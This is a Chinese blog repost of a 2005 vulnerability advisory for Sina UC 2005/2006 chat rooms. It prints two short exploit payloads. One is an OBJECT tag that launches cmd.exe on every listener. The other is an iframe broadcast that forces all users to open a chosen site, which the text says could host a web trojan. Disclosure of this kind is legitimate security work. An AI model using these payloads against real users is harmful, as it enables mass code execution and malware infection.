新浪UC聊天室的几个漏洞
以下消息来自幻影论坛[Ph4nt0m]邮件组。
献给大家一个SINA的UC漏洞。
详细内容见下面连接: http://www.netcicala.com/article/sort014/sort035/info-151.html 新浪UC是国内较早投入研发的即时通讯软件。新浪UC一直秉承创新的理念,不断推陈出新。新浪UC集传统即时通信软件功能于一体,融合P2P思想的新一代开放式网络即时通信娱乐软件,将有声有色、图文并茂的场景聊天模式,以及视频电话、可断点续传的文件传输、能够多人聊天的多人世界,消息群发功能和在线游戏功能以及同学录(团体)等有机结合,形成一个完整的网上即时通讯娱乐平台,满足人们日常工作和生活的需要,给大家带来边说、边看、边玩的网络生活全新感觉。 **************************************** UC语音/视频聊天室漏洞: **************************************** 漏洞描述: 在UC聊天室内具有管理员权限,可以让在聊天室内的所有开广播的用户执行任意程序,恶意发送者并执行WINDOWS系统内的任何程序如记事本/注册表编辑器/记事本等等。 影响版本: UC2005/2006。 漏洞补丁: 暂无。 补救措施: 屏蔽聊天室广播,并以文本形式显示广播。 严重程度: **********非常严重*********** 漏洞发现日期: 2005年11月 漏洞发现者: 网蝉 利用代码: 攻击者首先必须是聊天室的管理员,然后在聊天室内发送如下广播内容,则可使聊天室内所有聊友全部弹出CMD窗口。 <oBJECT classid="clsid:11111127-FC08-4373-8F54-1A02E3C15B7D" codebase="file://c:/windows/system32/cmd.exe"></oBJECT>
SINA 的UC的又一漏洞: 新浪UC是国内较早投入研发的即时通讯软件。新浪UC一直秉承创新的理念,不断推陈出新。新浪UC集传统即时通信软件功能于一体,融合P2P思想的新一代开放式网络即时通信娱乐软件,将有声有色、图文并茂的场景聊天模式,以及视频电话、可断点续传的文件传输、能够多人聊天的多人世界,消息群发功能和在线游戏功能以及同学录(团体)等有机结合,形成一个完整的网上即时通讯娱乐平台,满足人们日常工作和生活的需要,给大家带来边说、边看、边玩的网络生活全新感觉。 *************************************************************** UC语音/视频聊天室漏洞: *************************************************************** 漏洞描述: 首先在UC聊天室内要具有管理员权限,之后就可以在聊天时内发送漏洞利用代码,可以让在本聊天室内所有用户全部打开恶意发送者所指定的任意网站,如果网站内含有网页木马,则本聊天室所有用户将会全部中马。 影响版本/系统: UC2005/2006。 漏洞补丁: 暂无。 补救措施: 屏蔽聊天室广播,并以文本形式显示广播。 漏洞发现者: 网蝉 漏洞发现日期: 2005年11月 *************************************************************** 利用代码: 运行代码后,http://www.netccicala.com/index.html 会被浏览器直接打开。如果网页中存在恶意代码,则聊天室内所有用户全部会被感染。 本文出自 51CTO.COM技术博客<iFRAME src="http://www.netccicala.com/index.html"> |
beansprouts
博客统计信息
热门文章
最新评论
友情链接
